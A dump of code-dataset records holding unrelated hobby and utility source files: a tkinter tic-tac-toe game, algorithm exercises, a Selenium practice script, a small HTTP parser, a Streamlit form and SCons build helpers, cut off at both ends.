C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R\r\n global C1, C2,C3,C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R,L1,L2,L3\r\n global C1, L1, C2, L2, C3, L3\r\n global a\r\n morpion.delete('all')\r\n\r\n #\r\n #ici on recréer les lignes qui délimite les colones et les cases\r\n #\r\n\r\n\r\n morpion.create_line(0,100,300,100,fill=\"white\",width=4)\r\n\r\n morpion.create_line(0,200,300,200,fill=\"white\",width=4)\r\n\r\n morpion.create_line(100,300,300,-100000,fill=\"white\",width=4)\r\n\r\n morpion.create_line(200,300,300,-100000,fill=\"white\",width=4)\r\n \r\n C1=[2,2,2]\r\n L1=[2,2,2]\r\n\r\n C2=[3,3,3]\r\n L2=[3,3,3]\r\n\r\n C3=[4,4,4]\r\n L3=[4,4,4]\r\n\r\n a=1\r\n\r\ndef Verif():\r\n global C1, C2,C3,C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R,L1,L2,L3\r\n C1RC = C1.count(1)\r\n C1R = C1.count(0)\r\n C2RC = C2.count(1)\r\n C2R = C2.count(0)\r\n C3RC = C3.count(1)\r\n C3R = C3.count(0)\r\n \r\n L1RC = L1.count(1)\r\n L1R = L1.count(0)\r\n L2RC = L2.count(1)\r\n L2R = L2.count(0)\r\n L3RC = L3.count(1)\r\n L3R = L3.count(0)\r\n\r\n #\r\n #ici on affiche le joueur qui a gagner\r\n #\r\n\r\n if C1RC == 3 or C2RC == 3 or C3RC == 3 or (C1[0]==1 and C2[1]==1 and C3[2]==1) or (C1[2]==1 and C2[1]==1 and C3[0]==1) or L1RC == 3 or L2RC == 3 or L3RC == 3:\r\n \"\"\"\r\n Joueur 1\r\n \"\"\"\r\n add_point_score()\r\n replay_game()\r\n if C1R == 3 or C2R == 3 or C3R == 3 or (C1[0]==0 and C2[1]==0 and C3[2]==0) or (C1[2]==0 and C2[1]==0 and C3[0]==0) or L1R == 3 or L2R == 3 or L3R == 3:\r\n \"\"\"\r\n Joueur 2\r\n \"\"\"\r\n add_point_score2()\r\n replay_game()\r\n \r\n#\r\n#ici on initialise les colones et les lignes\r\n#\r\n\r\nC1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R = 0,0,0,0,0,0,0,0,0,0,0,0\r\n \r\n\r\n \r\na=1\r\n\r\nC1=[2,2,2]\r\nL1=[2,2,2]\r\n\r\nC2=[3,3,3]\r\nL2=[3,3,3]\r\n\r\nC3=[4,4,4]\r\nL3=[4,4,4]\r\n\r\n\r\n\r\n#\r\n# Création de la fenêtre principale\r\n#\r\n\r\nroot = Tk()\r\nroot.title(\"Morpion\")\r\nroot.minsize(600, 500)\r\nroot.resizable(False, False)\r\nroot.config(background='#C4C4C4')\r\nroot.title(\"Sn'Game | Morpion\")\r\nroot.iconbitmap(\"core/64px.ico\")\r\n\r\n\r\n\r\n#\r\n# Création d'un widget Canvas\r\n#\r\n\r\ntitle1 = Frame(root)\r\n\r\nhcan = Canvas(root, width = 500, height =500, bg =\"#2B2B2B\", highlightthickness=0)\r\nhcan.place(x=0,y=0)\r\n\r\nLargeur = 300\r\nHauteur = 300\r\nmorpion = Canvas(root, width = Largeur, height =Hauteur, bg =\"#2B2B2B\", highlightthickness=0)\r\n\r\n#\r\n# La méthode bind() permet de lier un événement avec une fonction :\r\n#\r\n# un clic gauche sur la zone graphique provoquera l'appel de la fonction utilisateur Clic()\r\n#\r\n\r\n\r\nmorpion.bind(\"\", Clic)\r\nmorpion.place(x=100,y=100)\r\n\r\n\r\n#\r\n#ici on créer les lignes qui délimite les colones et les cases\r\n#\r\n\r\n\r\nmorpion.create_line(0,100,300,100,fill=\"white\",width=4)\r\n\r\nmorpion.create_line(0,200,300,200,fill=\"white\",width=4)\r\n\r\nmorpion.create_line(100,300,300,-100000,fill=\"white\",width=4)\r\n\r\nmorpion.create_line(200,300,300,-100000,fill=\"white\",width=4)\r\n\r\n#\r\n# Création du texte\r\n#\r\n\r\ntext = Label(root, text=\" Morpion \", font=('Arial', 48),bg='#2B2B2B', fg='white')\r\ntext.place(x=450,y=0)\r\n\r\nhandmade = Label(root, text=\"Handmade by Kijusu\", font=('Roboto', 20),bg='#C4C4C4', fg='#121212')\r\nhandmade.place(x=520,y=445)\r\n\r\n#\r\n# Création des boutons et des Entrée de texte\r\n#\r\n\r\nvalider_button =Button(root, text=\"Valider\", bg='#5E5E5E',font=('Arial', 15), fg='#C4C4C4',activebackground = \"#5E5E5E\", activeforeground = \"#C4C4C4\", command=lambda: [f() for f in [player_info, change_name]])\r\nvalider_button.place(x=598, y=360, width=100, height=27)\r\n\r\npseudo_txt = Label(root, text=\"Pseudo joueur 1 :\", font=('Arial', 18),bg='#C4C4C4', fg='#2B2B2B')\r\npseudo_txt.place(x=558, y=165)\r\n\r\npseudonyme = Entry(root, text=\"Pseudo\", bg='#EDEDED', fg='#2B2B2B', bd=0 ,width=29,highlightthickness=0, justify='center', font=('Arial', 9))\r\npseudonyme.place(x=550, y=200, height=25)\r\n\r\npseudo_txt_two = Label(root, text=\"Pseudo joueur 2 :\", font=('Arial', 18),bg='#C4C4C4', fg='#2B2B2B')\r\npseudo_txt_two.place(x=558, y=265)\r\n\r\npseudonyme_two = Entry(root, text=\"Pseudotwo\", bg='#EDEDED', fg='#2B2B2B', bd=0 ,width=29,highlightthickness=0, justify='center', font=('Arial', 9))\r\npseudonyme_two.place(x=550, y=300, height=25)\r\n\r\ndef ascore():\r\n\r\n line = Canvas(root, width=50, height=60, bg='#2A2A2A', highlightthickness=0)\r\n line.create_line(20,30,30,-100000,fill=\"white\",width=3)\r\n line.place(x=228, y=30)\r\n\r\n score_canvas1 = Canvas(root, width=120, height=60, bg='#2A2A2A', highlightthickness=0)\r\n score_canvas1.create_rectangle(0, 15, 120, 45, fill='#443F42', width=0)\r\n score_canvas1.place(x=128, y=15)\r\n\r\n score_canvas2 = Canvas(root, width=120, height=60, bg='#2A2A2A', highlightthickness=0)\r\n score_canvas2.create_rectangle(0, 15, 120, 45, fill='#443F42', width=0)\r\n score_canvas2.place(x=250, y=15)\r\nascore()\r\n\r\njoueur1 = Label(root, text=\"Joueur 1\", bg=\"#2A2A2A\", fg=\"white\", font=(\"Arial\",10))\r\njoueur1.place(x=128, y=5)\r\n\r\njoueur2 = Label(root, text=\"Joueur 2\", bg=\"#2A2A2A\", fg=\"white\", font=(\"Arial\",10))\r\njoueur2.place(x=316, y=5)\r\n\r\ndef change_name():\r\n global pseudonyme\r\n psde1= pseudonyme.get()\r\n psde2 = pseudonyme_two.get()\r\n # prevoir la variable pour recevoir le texte saisi\r\n joueur1['text'] = psde1\r\n joueur2['text'] = psde2\r\n joueur1.place(x=128, y=5)\r\n joueur2.place(x=357-7*(len(psde2)-1), y=5)\r\n\r\n \"\"\"\r\n x= 360\r\n y= 5\r\n \"\"\"\r\n\r\n#\r\n# Centrer la fenêtre en fonction de l'écran de l'ordinateur\r\n#\r\n\r\nw =800\r\nh =500\r\n\r\nws = root.winfo_screenwidth()\r\nhs = root.winfo_screenheight()\r\n# calculate position x, y\r\nx = (ws/2) - (w/2) \r\ny = (hs/2) - (h/2)\r\nroot.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n\r\n#\r\n# Afficher la fennetre\r\n#\r\n\r\nmainloop()\r\n","repo_name":"MaxenceR26/morpion-tkinter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14574,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39226464368","text":"from collections import deque\r\n\r\n# define the four possible movements (up, down, left, right)\r\ndx = [-1, 1, 0, 0]\r\ndy = [0, 0, -1, 1]\r\n\r\n# read the input\r\nn, m = map(int, input().split())\r\ngrid = []\r\nfor i in range(n):\r\n row = list(map(int, input().split()))\r\n grid.append(row)\r\n\r\n# find the location of the target\r\nfor i in range(n):\r\n for j in range(m):\r\n if grid[i][j] == 2:\r\n target_x, target_y = i, j\r\n\r\n# initialize the distance matrix\r\ndist = [[-1]*m for i in range(n)]\r\n\r\n# breadth-first search starting from the target\r\nqueue = deque([(target_x, target_y)])\r\ndist[target_x][target_y] = 0\r\n\r\nwhile queue:\r\n curr_x, curr_y = queue.popleft()\r\n for i in range(4):\r\n next_x, next_y = curr_x + dx[i], curr_y + dy[i]\r\n if next_x < 0 or next_x >= n or next_y < 0 or next_y >= m:\r\n continue\r\n if grid[next_x][next_y] == 0:\r\n continue\r\n if dist[next_x][next_y] != -1:\r\n continue\r\n dist[next_x][next_y] = dist[curr_x][curr_y] + 1\r\n queue.append((next_x, next_y))\r\n\r\n# print the result\r\nfor i in range(n):\r\n for j in range(m):\r\n if grid[i][j] == 0:\r\n print(\"0\", end=\" \")\r\n elif dist[i][j] == -1:\r\n print(\"-1\", end=\" \")\r\n else:\r\n print(dist[i][j], end=\" \")\r\n print()\r\n","repo_name":"unboxing96/ALGO","sub_path":"백준/Silver/14940. 쉬운 최단거리/쉬운 최단거리.py","file_name":"쉬운 최단거리.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1352168208","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport math\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry: \n link = \"http://suninjuly.github.io/alert_accept.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n\n # Нажимаем на кнопку\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\n # Принимаем confirm\n confirm = browser.switch_to.alert\n confirm.accept()\n\n # ждем загрузки страницы\n time.sleep(1)\n\n # Считываем число Х\n x1 = browser.find_element(By.ID, 'input_value')\n x = x1.text\n # Считаем формулу\n y = calc(x)\n\n # Записываем в поле ответ формулы\n input1 = browser.find_element(By.ID, \"answer\")\n input1.send_keys(y)\n\n # Отправляем данные\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(30)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла\n","repo_name":"griinadiine/stepik_auto_tests_course","sub_path":"script234.py","file_name":"script234.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30896037328","text":"from random import randint\n\nkeepPlaying = \"y\"\n\nwhile(keepPlaying != \"n\"):\n\tanswer = randint(1, 11)\n\tcorrect = False\n\n\twhile(correct != True):\n\t\tguess = input(\"Guess a number between 1 and 10: \")\n\t\tguess = int(guess)\n\n\t\tif guess < answer:\n\t\t\tprint(\"Too low, try again!\")\n\t\telif guess > answer:\n\t\t\tprint(\"Too high, try again!\")\n\t\telse:\n\t\t\tprint(\"You guessed it! You won!\")\n\t\t\tcorrect = True\n\tkeepPlaying = input(\"Do you want to keep playing? (y/n)\")\nprint(\"Thanks for playing!\")","repo_name":"kcastillo23116/ModernPythonBootCamp","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34313569420","text":"import json\nimport request\n\n\nPARSE_INCOMPLETE = 0\nPARSE_COMPLETE = 1\nPARSE_ERROR = 2\n\n\ndef parse_start_line(msg):\n [method, path, version] = msg.split(\" \")\n return (method, path, version)\n\ndef parse_header(str_header):\n headers = {}\n lines = str_header.split(\"\\r\\n\")\n for line in lines:\n [field, value] = line.split(\":\", 1)\n k = field.strip().lower()\n headers[k] = value.strip()\n return headers\n\ndef parse_http_header(header):\n [str_start_line, str_header] = header.split(\"\\r\\n\", 1)\n (method, path, version) = parse_start_line(str_start_line)\n headers = parse_header(str_header)\n req_info = {\n \"method\": method,\n \"path\": path,\n \"version\": version\n }\n return (True, {\"len\": len(header), \"req_info\": req_info, \"headers\": headers})\n\ndef parse_disposition(disp):\n items = disp.split(b\";\")\n disposition = items[0].strip()\n params = {}\n for opt in items[1:]:\n k, v = opt.split(b\"=\")\n params[k.strip().decode()] = v.strip().strip(b'\"').decode()\n return disposition, params\n\ndef parse_multipart_form_data(boundary, data, args):\n if boundary.startswith('\"') and boundary.endswith('\"'):\n boundary = boundary[1:-1]\n final_boundary_index = data.rfind(\"--\" + boundary + \"--\")\n if final_boundary_index == -1:\n return False\n parts = data[:final_boundary_index].split(\"--\" + boundary + \"\\r\\n\")\n for part in parts:\n if not part:\n continue\n eoh = part.find(\"\\r\\n\\r\\n\")\n if eoh == -1:\n continue\n headers = parse_header(part[:eoh])\n disp = headers.get(\"content-disposition\", \"\")\n disposition, disp_params = parse_disposition(disp)\n if disposition != \"form-data\" or not part.endswith(\"\\r\\n\"):\n continue\n value = part[eoh + 4 : -2]\n if value == 'undefined':\n value = None\n if not disp_params.get(\"name\"):\n continue\n name = disp_params[\"name\"]\n if disp_params.get(\"filename\"):\n if not name in args:\n args[name] = []\n ctype = headers.get(\"content-type\", \"application/unknown\")\n args[name].append({\n \"filename\": disp_params[\"filename\"],\n \"content\": value,\n \"type\": ctype\n })\n else:\n args[name] = value\n return True\n\ndef parse_request_body(headers, str_body):\n if not \"content-length\" in headers or not \"content-type\" in headers:\n return (False, PARSE_INCOMPLETE)\n\n body_len = int(headers[\"content-length\"])\n if len(str_body) != body_len:\n return (False, PARSE_INCOMPLETE)\n\n body = {}\n content_type = headers['content-type']\n if content_type.find(\"application/x-www-form-urlencoded\") != -1:\n items = str_body.split(\"&\")\n for item in items:\n [field, value] = item.split(\"=\")\n k = field.strip()\n body[k] = value.strip()\n return (True, {\"len\": body_len, \"body\": body})\n\n if content_type.find(\"multipart/form-data\") != -1:\n args = {}\n flag = True\n fields = content_type.split(\";\")\n for field in fields:\n k, sep, v = field.strip().partition(\"=\")\n if k != \"boundary\" or not v:\n continue\n flag = parse_multipart_form_data(v, str_body, args)\n if not flag:\n break\n if not flag:\n return (False, PARSE_INCOMPLETE)\n body = args\n return (True, {\"len\": body_len, \"body\": body})\n\n if content_type.find(\"application/json\") != -1:\n body = json.loads(str_body)\n return (True, {\"len\": body_len, \"body\": body})\n return (False, PARSE_INCOMPLETE)\n\ndef parse_http_message(msg):\n if msg.find(\"\\r\\n\\r\\n\") == -1:\n return (False, PARSE_INCOMPLETE)\n\n [header, body] = msg.split(\"\\r\\n\\r\\n\", 1)\n (result, header_info) = parse_http_header(header)\n if not result:\n return (False, PARSE_ERROR)\n\n req_info = header_info[\"req_info\"]\n header_len = header_info[\"len\"]\n headers = header_info[\"headers\"]\n (result, info) = parse_request_body(headers, body)\n\n if not result:\n return (False, info)\n\n body_len = info[\"len\"]\n req = request.Request(\n req_info[\"method\"],\n req_info[\"path\"],\n req_info[\"version\"],\n headers,\n info[\"body\"]\n )\n return (True, {\"len\": header_len + body_len + 4, \"request\": req})\n\n\ndef parse(conn):\n r = (result, info) = parse_http_message(conn.buffer)\n if not result:\n return r\n\n msg_len = info[\"len\"]\n conn.buffer = conn.buffer[msg_len:]\n return (True, info[\"request\"])\n","repo_name":"hejingsong/sge-service","sub_path":"example/pyhttp/src/pylib/http_parser.py","file_name":"http_parser.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74580854652","text":"def main():\n n = int(input())\n a = list(map(int,input().split()))\n d = int(input())\n b = [0]*n\n if d%n==0:\n for i in a:\n print(i,end=\" \")\n else:\n d = d%n\n for i in range(n):\n x = i-d\n if x<0:\n x = n+x\n b[x] = a[i]\n for i in b:\n print(i,end=\" \")\n\nif __name__==\"__main__\":\n main()","repo_name":"kothariji/competitive-programming","sub_path":"Arrays/(HACKERRANK)LeftRotateArray.py","file_name":"(HACKERRANK)LeftRotateArray.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":612,"dataset":"github-code","pt":"78"} +{"seq_id":"14043163254","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 27 19:43:39 2023\n\n@author: Kusafqe\n\"\"\"\n\nnumero1 = int(input(\"Introduzca el primer número: \"))\nnumero2 = int(input(\"Introduzca el segundo número: \"))\n\nif numero1 % numero2 == 0:\n print(\"El número \", numero2, \"divide a \", numero1)\n \nelif numero2 % numero1 == 0:\n print(\"El número \", numero1, \"divide a \", numero2)\nelse:\n print(\"Ninguno es divisible por el otro\")\n ","repo_name":"Kusafqe/cursoIA","sub_path":"Módulo2/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29970198646","text":"import streamlit as st\nimport datetime\nfrom functions import insert_into_table, display_time\n\nconn = st.session_state[\"conn\"]\n\nauthenticator = st.session_state[\"authenticator\"]\n\nif st.session_state[\"authentication_status\"]:\n authenticator.logout('Logout', 'main')\n with st.form(\"my_form\", clear_on_submit=True):\n employer_name = st.text_input(\"Name\", max_chars=255)\n employer_description = st.text_input(\"Description\", max_chars=255)\n start_date = st.date_input(\"start date\")\n wage = st.number_input(label=\"Wage\", format=\"%.2f\", min_value=0.00, max_value=100.00, step=0.01)\n submit_button = st.form_submit_button(label=\"Submit\")\n\n if submit_button:\n employer_id = insert_into_table(conn,\"employer\",\n [\"employer_name\",\"employer_description\"],\n [employer_name,employer_description])\n insert_into_table(conn,\"wage_history\",[\"employer_id\",\n \"start_date, wage\"],\n [employer_id,start_date,wage])\n st.success(\"Employer and wage information saved successfully.\")\nelse:\n st.warning('Please enter your username and password') ","repo_name":"JimCortes/Hours","sub_path":"pages/4_🔢_new_employer.py","file_name":"4_🔢_new_employer.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4100417470","text":"#!/usr/bin/python -t\n\n# linked list\n\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param head: the first Node\n @return: the answer after plus one\n \"\"\"\n def plusOne(self, head):\n # Write your code here\n if not head:\n return head\n \n r = self.reverse(head)\n \n self.addOne(r)\n \n return self.reverse(r)\n \n \n def reverse(self, head):\n prev = None\n while head:\n n = head.next\n head.next = prev\n prev = head\n head = n\n \n return prev\n \n def addOne(self, l):\n c = 1\n dummy = ListNode(0)\n dummy.next = l\n prev = dummy\n \n while l:\n val = l.val + c\n c = val/10\n val = val%10\n l.val = val\n l = l.next\n prev = prev.next\n \n if c:\n prev.next = ListNode(c)\n \n return\n \n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0904_plus_one_linked_list.py","file_name":"0904_plus_one_linked_list.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36515116592","text":"import os\n\n# Keep a global dictionary of library target params for lookups in\n# ExtendComponent().\n_all_lib_targets = {}\n\ndef _GenericLibrary(env, static, **kwargs):\n \"\"\"Extends ComponentLibrary to support multiplatform builds\n of dynamic or static libraries.\n\n Args:\n env: The environment object.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentLibrary\n \"\"\"\n params = CombineDicts(kwargs, {'COMPONENT_STATIC': static})\n return ExtendComponent(env, 'ComponentLibrary', **params)\n\n\ndef Library(env, **kwargs):\n \"\"\"Extends ComponentLibrary to support multiplatform builds of static\n libraries.\n\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentLibrary\n \"\"\"\n return _GenericLibrary(env, True, **kwargs)\n\n\ndef DynamicLibrary(env, **kwargs):\n \"\"\"Extends ComponentLibrary to support multiplatform builds\n of dynmic libraries.\n\n Args:\n env: The environment object.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentLibrary\n \"\"\"\n return _GenericLibrary(env, False, **kwargs)\n\n\ndef Object(env, **kwargs):\n return ExtendComponent(env, 'ComponentObject', **kwargs)\n\n\ndef Unittest(env, **kwargs):\n \"\"\"Extends ComponentTestProgram to support unittest built\n for multiple platforms.\n\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentProgram.\n \"\"\"\n kwargs['name'] = kwargs['name'] + '_unittest'\n\n common_test_params = {\n 'posix_cppdefines': ['GUNIT_NO_GOOGLE3', 'GTEST_HAS_RTTI=0'],\n 'libs': ['unittest_main', 'gunit']\n }\n if not kwargs.has_key('explicit_libs'):\n common_test_params['win_libs'] = [\n 'advapi32',\n 'crypt32',\n 'iphlpapi',\n 'secur32',\n 'shell32',\n 'shlwapi',\n 'user32',\n 'wininet',\n 'ws2_32'\n ]\n common_test_params['lin_libs'] = [\n 'crypto',\n 'pthread',\n 'ssl',\n ]\n\n params = CombineDicts(kwargs, common_test_params)\n return ExtendComponent(env, 'ComponentTestProgram', **params)\n\n\ndef App(env, **kwargs):\n \"\"\"Extends ComponentProgram to support executables with platform specific\n options.\n\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentProgram.\n \"\"\"\n if not kwargs.has_key('explicit_libs'):\n common_app_params = {\n 'win_libs': [\n 'advapi32',\n 'crypt32',\n 'iphlpapi',\n 'secur32',\n 'shell32',\n 'shlwapi',\n 'user32',\n 'wininet',\n 'ws2_32'\n ]}\n params = CombineDicts(kwargs, common_app_params)\n else:\n params = kwargs\n return ExtendComponent(env, 'ComponentProgram', **params)\n\ndef WiX(env, **kwargs):\n \"\"\" Extends the WiX builder\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n The node produced by the environment's wix builder\n \"\"\"\n return ExtendComponent(env, 'WiX', **kwargs)\n\ndef Repository(env, at, path):\n \"\"\"Maps a directory external to $MAIN_DIR to the given path so that sources\n compiled from it end up in the correct place under $OBJ_DIR. NOT required\n when only referring to header files.\n\n Args:\n env: The current environment object.\n at: The 'mount point' within the current directory.\n path: Path to the actual directory.\n \"\"\"\n env.Dir(at).addRepository(env.Dir(path))\n\n\ndef Components(*paths):\n \"\"\"Completes the directory paths with the correct file\n names such that the directory/directory.scons name\n convention can be used.\n\n Args:\n paths: The paths to complete. If it refers to an existing\n file then it is ignored.\n\n Returns:\n The completed lif scons files that are needed to build talk.\n \"\"\"\n files = []\n for path in paths:\n if os.path.isfile(path):\n files.append(path)\n else:\n files.append(ExpandSconsPath(path))\n return files\n\n\ndef ExpandSconsPath(path):\n \"\"\"Expands a directory path into the path to the\n scons file that our build uses.\n Ex: magiflute/plugin/common => magicflute/plugin/common/common.scons\n\n Args:\n path: The directory path to expand.\n\n Returns:\n The expanded path.\n \"\"\"\n return '%s/%s.scons' % (path, os.path.basename(path))\n\n\ndef AddMediaLibs(env, **kwargs):\n lmi_libdir = '$GOOGLE3/../googleclient/third_party/lmi/files/lib/'\n if env.Bit('windows'):\n if env.get('COVERAGE_ENABLED'):\n lmi_libdir += 'win32/c_only'\n else:\n lmi_libdir += 'win32/Release'\n elif env.Bit('mac'):\n lmi_libdir += 'macos'\n elif env.Bit('linux'):\n lmi_libdir += 'linux/x86'\n\n\n AddToDict(kwargs, 'libdirs', [\n '$MAIN_DIR/third_party/gips/Libraries/',\n lmi_libdir,\n ])\n\n gips_lib = ''\n if env.Bit('windows'):\n if env.Bit('debug'):\n gips_lib = 'gipsvoiceenginelib_mtd'\n else:\n gips_lib = 'gipsvoiceenginelib_mt'\n elif env.Bit('mac'):\n gips_lib = 'VoiceEngine_mac_universal_gcc'\n elif env.Bit('linux'):\n gips_lib = 'VoiceEngine_Linux_gcc'\n\n\n AddToDict(kwargs, 'libs', [\n gips_lib,\n 'LmiAudioCommon',\n 'LmiClient',\n 'LmiCmcp',\n 'LmiDeviceManager',\n 'LmiH263ClientPlugIn',\n 'LmiH263CodecCommon',\n 'LmiH263Decoder',\n 'LmiH263Encoder',\n 'LmiH264ClientPlugIn',\n 'LmiH264CodecCommon',\n 'LmiH264Common',\n 'LmiH264Decoder',\n 'LmiH264Encoder',\n 'LmiIce',\n 'LmiMediaPayload',\n 'LmiOs',\n 'LmiPacketCache',\n 'LmiProtocolStack',\n 'LmiRateShaper',\n 'LmiRtp',\n 'LmiSecurity',\n 'LmiSignaling',\n 'LmiStun',\n 'LmiTransport',\n 'LmiUi',\n 'LmiUtils',\n 'LmiVideoCommon',\n 'LmiXml',\n ])\n\n if env.Bit('windows'):\n AddToDict(kwargs, 'libs', [\n 'dsound',\n 'd3d9',\n 'gdi32',\n 'strmiids',\n ])\n\n if env.Bit('mac'):\n AddToDict(kwargs, 'FRAMEWORKS', [\n 'AudioToolbox',\n 'AudioUnit',\n 'Cocoa',\n 'CoreAudio',\n 'CoreFoundation',\n 'IOKit',\n 'QTKit',\n 'QuickTime',\n 'QuartzCore',\n ])\n return kwargs\n\n\ndef ReadVersion(filename):\n \"\"\"Executes the supplied file and pulls out a version definition from it. \"\"\"\n defs = {}\n execfile(str(filename), defs)\n if not defs.has_key('version'):\n return '0.0.0.0'\n version = defs['version']\n parts = version.split(',')\n build = os.environ.get('GOOGLE_VERSION_BUILDNUMBER')\n if build:\n parts[-1] = str(build)\n return '.'.join(parts)\n\n\n#-------------------------------------------------------------------------------\n# Helper methods for translating talk.Foo() declarations in to manipulations of\n# environmuent construction variables, including parameter parsing and merging,\n#\ndef GetEntry(dict, key):\n \"\"\"Get the value from a dictionary by key. If the key\n isn't in the dictionary then None is returned. If it is in\n the dictionaruy the value is fetched and then is it removed\n from the dictionary.\n\n Args:\n key: The key to get the value for.\n kwargs: The keyword argument dictionary.\n Returns:\n The value or None if the key is missing.\n \"\"\"\n value = None\n if dict.has_key(key):\n value = dict[key]\n dict.pop(key)\n\n return value\n\n\ndef MergeAndFilterByPlatform(env, params):\n \"\"\"Take a dictionary of arguments to lists of values, and, depending on\n which platform we are targetting, merge the lists of associated keys.\n Merge by combining value lists like so:\n {win_foo = [a,b], lin_foo = [c,d], foo = [e], mac_bar = [f], bar = [g] }\n becomes {foo = [a,b,e], bar = [g]} on windows, and\n {foo = [e], bar = [f,g]} on mac\n\n Args:\n env: The hammer environment which knows which platforms are active\n params: The keyword argument dictionary.\n Returns:\n A new dictionary with the filtered and combined entries of params\n \"\"\"\n platforms = {\n 'linux': 'lin_',\n 'mac': 'mac_',\n 'posix': 'posix_',\n 'windows': 'win_',\n }\n active_prefixes = [\n platforms[x] for x in iter(platforms) if env.Bit(x)\n ]\n inactive_prefixes = [\n platforms[x] for x in iter(platforms) if not env.Bit(x)\n ]\n\n merged = {}\n for arg, values in params.iteritems():\n inactive_platform = False\n\n key = arg\n\n for prefix in active_prefixes:\n if arg.startswith(prefix):\n key = arg[len(prefix):]\n\n for prefix in inactive_prefixes:\n if arg.startswith(prefix):\n inactive_platform = True\n\n if inactive_platform:\n continue\n\n AddToDict(merged, key, values)\n\n return merged\n\n# Linux can build both 32 and 64 bit on 64 bit host, but 32 bit host can\n# only build 32 bit. For 32 bit debian installer a 32 bit host is required.\n# ChromeOS (linux) ebuild don't support 64 bit and requires 32 bit build only\n# for now.\ndef Allow64BitCompile(env):\n return (env.Bit('linux') and env.Bit('platform_arch_64bit')\n )\n\ndef MergeSettingsFromLibraryDependencies(env, params):\n if params.has_key('libs'):\n for lib in params['libs']:\n if (_all_lib_targets.has_key(lib) and\n _all_lib_targets[lib].has_key('dependent_target_settings')):\n params = CombineDicts(\n params,\n MergeAndFilterByPlatform(\n env,\n _all_lib_targets[lib]['dependent_target_settings']))\n return params\n\ndef ExtendComponent(env, component, **kwargs):\n \"\"\"A wrapper around a scons builder function that preprocesses and post-\n processes its inputs and outputs. For example, it merges and filters\n certain keyword arguments before appending them to the environments\n construction variables. It can build signed targets and 64bit copies\n of targets as well.\n\n Args:\n env: The hammer environment with which to build the target\n component: The environment's builder function, e.g. ComponentProgram\n kwargs: keyword arguments that are either merged, translated, and passed on\n to the call to component, or which control execution.\n TODO(): Document the fields, such as cppdefines->CPPDEFINES,\n prepend_includedirs, include_talk_media_libs, etc.\n Returns:\n The output node returned by the call to component, or a subsequent signed\n dependant node.\n \"\"\"\n env = env.Clone()\n\n # prune parameters intended for other platforms, then merge\n params = MergeAndFilterByPlatform(env, kwargs)\n\n # get the 'target' field\n name = GetEntry(params, 'name')\n\n # save pristine params of lib targets for future reference\n if 'ComponentLibrary' == component:\n _all_lib_targets[name] = dict(params)\n\n # add any dependent target settings from library dependencies\n params = MergeSettingsFromLibraryDependencies(env, params)\n\n # if this is a signed binary we need to make an unsigned version first\n signed = env.Bit('windows') and GetEntry(params, 'signed')\n if signed:\n name = 'unsigned_' + name\n\n # add default values\n if GetEntry(params, 'include_talk_media_libs'):\n params = AddMediaLibs(env, **params)\n\n # potentially exit now\n srcs = GetEntry(params, 'srcs')\n if not srcs or not hasattr(env, component):\n return None\n\n # apply any explicit dependencies\n dependencies = GetEntry(params, 'depends')\n if dependencies is not None:\n env.Depends(name, dependencies)\n\n # put the contents of params into the environment\n # some entries are renamed then appended, others renamed then prepended\n appends = {\n 'cppdefines' : 'CPPDEFINES',\n 'libdirs' : 'LIBPATH',\n 'link_flags' : 'LINKFLAGS',\n 'libs' : 'LIBS',\n 'FRAMEWORKS' : 'FRAMEWORKS',\n }\n prepends = {}\n if env.Bit('windows'):\n # MSVC compile flags have precedence at the beginning ...\n prepends['ccflags'] = 